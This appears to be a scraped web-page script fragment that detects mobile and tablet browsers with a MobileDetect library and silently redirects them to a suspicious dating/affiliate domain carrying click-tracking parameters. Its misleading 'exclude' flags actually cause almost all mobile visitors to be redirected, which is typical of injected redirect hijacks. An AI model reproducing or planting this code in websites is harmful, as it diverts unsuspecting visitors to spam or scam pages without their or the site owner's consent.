<script src="https://cdn-bimi.akamaized.net/mr/mobile-detect.min.js"></script> <script type="text/javascript">

var md = new MobileDetect(window.navigator.userAgent);

if (md.mobile() || md.tablet()) {

var redirect = false;

var excludeTablets = true;

var excludeIOSAndroid = true;

var isiOs = md.is("iOs"); var isAndroidOs = md.is("AndroidOs"); var isFeaturePhone = md.mobile() && !isiOs && !isAndroidOs; if (isFeaturePhone || md.tablet() && excludeTablets

|| (((isiOs && !md.tablet()) || isAndroidOs) && excludeIOSAndroid)) {

redirect = true;

}

if (redirect) {

location.href= 'https://wemweq.lncredlbiedate.com/c/da57dc555e50572d?s1=120241&s2=1261720&s3=Yuh_maning_&click_id=Yuh_maning_&j5=1&j6=1'; }}</script>
